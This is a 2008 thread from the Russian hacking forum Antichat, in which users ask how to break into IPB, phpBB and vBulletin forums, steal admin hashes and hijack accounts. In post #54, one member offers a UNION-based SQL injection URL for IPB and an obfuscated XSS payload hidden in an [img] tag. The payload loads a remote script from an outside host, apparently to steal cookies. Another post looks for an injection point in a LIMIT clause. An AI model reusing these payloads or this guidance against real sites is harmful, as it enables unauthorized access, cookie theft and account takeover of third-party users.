HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #51  
Старый 16.07.2008, 18:28
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами: 9741777

Репутация: 100
По умолчанию

OMG!!, а если попробовать поискать на milw0rm.com или Securitylab.ru эксплоиты? Какие цели ты преследуешь? Поломать любыми способами? Или утянуть хеш администратора?
 
Ответить с цитированием

  #52  
Старый 16.07.2008, 18:55
OMG!!
Постоянный
Регистрация: 25.02.2008
Сообщений: 331
С нами: 9583330

Репутация: 189
По умолчанию

Ershik, являясь администратором ресурсов в своей сети.. хеш админа на этом форуме у меня есть.. буду надеятся, что он совпадет с админкой на его форуме.. но хеш жесток, и пока его не взломали. Цель - получить доступ к кое-чему на этом сервере. Самое дырявое на том ресурсе - пожалуй сайт на джумле ( проверял все компоненты.. ничего путного нет ) и этот форум.. :-) вот..
 
Ответить с цитированием

  #53  
Старый 17.07.2008, 21:55
LamerNAH
Новичок
Регистрация: 05.11.2006
Сообщений: 2
С нами: 10270940

Репутация: 0
По умолчанию

Я не понял 1)xss(активные и пассивные)
Смотрите значит я пишу просто пост вставляю этот когд потом юзер что должен сделать? нажать на мой пост или нажать на тот код или как? и потом на какой снифер должны прийти кукис? как я с того снифера смогу их достать?
 
Ответить с цитированием

  #54  
Старый 22.07.2008, 21:53
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию

hi мне на форуме нужно 200 постов чтоб инфу читать..
Цитата:
allcheats.ru/t47219/
мне бы любой акк с 200 месагами..
стоит булка переделанная, брут будет долго... хсс.. чтот не разкрутил..модулей не обнаружил.
короче) вопрос КАК можно чтото сделать?


OMG!!
IPB 2.1.7 remote password changer будет работать только есть debug level = 3
осталась скуля:
Цитата:
index.php?act=mod&f=-6&CODE=prune_finish&pergo=50&current=50&max=3&star ter=1+union+select+1/*
и хсс:
Цитата:
[img]http://www.vital.h.com.ua/[snapback] onerror=script=document.createElement(String.fromC harCode(115,99,114,
105,112,116)),script.src=/http:xxdaim.ruxmonzterxforum/.source.replace(/x/g,String.fromCharCode(47)),
head=document.getElementsByTagName(String.fromChar Code(104,101,97,100)).item(0),head.appendChild(scr ipt)
style=visibility:hidden =[/snapback].gif[/img]

Последний раз редактировалось sabe; 22.07.2008 в 22:01..
 
Ответить с цитированием

  #55  
Старый 01.08.2008, 00:03
mash16
Новичок
Регистрация: 30.07.2008
Сообщений: 1
С нами: 9358905

Репутация: -1
По умолчанию

Знатоки,помогите:

forum/weblogs_news.php?=&order=&start=-20

пишет:

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20, 20' at line 7

SELECT e.entry_id, e.entry_access, e.entry_subject, e.entry_time, e.entry_views, e.entry_poster_id, e.entry_text, e.bbcode_uid, e.entry_mood, e.entry_currently, e.currently_text, e.entry_replies, u.user_id, u.username FROM weblog_entries AS e, users AS u WHERE entry_access <= 0 AND e.entry_poster_id = u.user_id AND e.entry_deleted <> 1 ORDER BY entry_id DESC LIMIT -20, 20

Line : 150
File : weblogs_news.php

здесь можно сделать SQL inj?
 
Ответить с цитированием

  #56  
Старый 01.08.2008, 23:22
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию

mash16
иньекция как я понимаю в лимите..
 
Ответить с цитированием

  #57  
Старый 06.11.2008, 17:38
kentuss
Новичок
Регистрация: 29.03.2008
Сообщений: 4
С нами: 9535536

Репутация: -1
По умолчанию

как узнать пароль админа на форуме Invision Power Board v1.3.1 Final ?? помогите плиз
 
Ответить с цитированием

  #58  
Старый 02.12.2008, 15:29
RomaM65
Новичок
Регистрация: 01.12.2008
Сообщений: 10
С нами: 9179907

Репутация: 0
По умолчанию

Люди а не подскажете как можно брутить форумы на phpBB а то у меня акк угнали а я надеюсь вернуть брутом или чем нить другим я лично форум ломать не хочу а только свой акк вернуть
Плизз поделитесь опыцтом в етих делах с чего начать или кратко поясните
 
Ответить с цитированием

  #59  
Старый 15.12.2008, 18:29
AzzkyAspid
Новичок
Регистрация: 21.03.2007
Сообщений: 10
С нами: 10074261

Репутация: 6
По умолчанию

Товарищи, прошу помочь!

Дано: форум Bulletin® v3.8.0 Release Candidate 1, мой аккаунт с правами юзера.

Необходимо: удалить свой профиль.

Решение: как????

Доп.инфа: облазил всю вкладку Мой кабинет - нет и намека на кнопку "Удалить профиль".
 
Ответить с цитированием

  #60  
Старый 16.12.2008, 02:55
1ce666
Участник форума
Регистрация: 09.12.2008
Сообщений: 159
С нами: 9168511

Репутация: 214
По умолчанию

Можно как нибудь угнать акк на двиге VBulletin 3.6.6 ???
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Внимание! Найдена уязвимость форумов на offtop.ru! Black_Kardinal Уязвимости CMS / форумов 14 09.01.2006 13:58
Помощь по взлому Ipb 2.1.1 Snake Уязвимости CMS / форумов 24 22.11.2005 15:47



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.